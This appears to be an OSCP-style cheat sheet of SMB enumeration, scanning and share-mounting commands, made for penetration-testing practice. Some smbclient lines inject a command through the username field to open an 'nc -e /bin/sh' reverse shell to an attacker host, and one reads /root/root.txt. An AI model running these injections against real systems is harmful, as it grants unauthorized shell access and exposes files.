OSCP
Search…
SMB Enumeration

SMB Tools

1
smbclient -L x.x.x.x
2
smbmount //x.x.x.x/share /mnt –o username=hodor,workgroup=hodor
3
smbclient \\\\x.x.x.x\\share
4
enum4linux -a ip
5
rpcclient -U "" x.x.x.x #Anonymous bind using rpcclient / Null connect
6
smbclient //MOUNT/share #Connect to SMB share
7
8
smbclient -U "/=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I ip //LAME/tmp
9
10
nmap -T4 -sS -sC -Pn -A --script smb-vuln* ip
11
smbclient //ip/tmp
12
logon "./=`nohup nc -e /bin/sh LHOST LPORT`"
13
14
smbclient -U "/=\`nohup cat /root/root.txt > /tmp/ttt\`" -N -I ip //LAME/tmp
15
16
smbclient -U "/=\`nohup nc -e /bin/sh 10.10.15.11 60000\`" -N -I ip //LAME/tmp
17
18
smbclient -L ip
19
enum4linux -S ip
20
21
22
Copied!

Nmap SMB Script Scan

1
#SMB Users and share Scan
2
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse ip
3
4
#SMB Vulnerability Scan
5
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse ip
6
nmap –script smb-check-vulns.nse –script-args=unsafe=1 -p445 ip
7
nmap --script=smb-check-vulns.nse x.x.x.x
8
Copied!

Mounting File Share

1
mount ip:/vol/share /mnt/nfs -nolock
2
mount -t cifs -o username=user,password=pass,domain=blah //ip.X/share-name /mnt/cifs
3
mount -t cifs //x.x.x.x/share /mnt
4
mount -t cifs -o username=hodor,password=hodor //x.x.x.x/share /mnt
5
Mounting File Share
6
showmount -e IPADDR
Copied!
Mounting Share folder
1
sudo mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other
2
Copied!

Create a SMB Server

1
in kali hosting a smb server
2
impacket-smbserver ShareFolder `pwd`
3
4
In windows
5
New-PSDrive -Name "Followme" -PSProvider "FileSystem" -Root "\\ip\ShareFolder"
Copied!
Last modified 1yr ago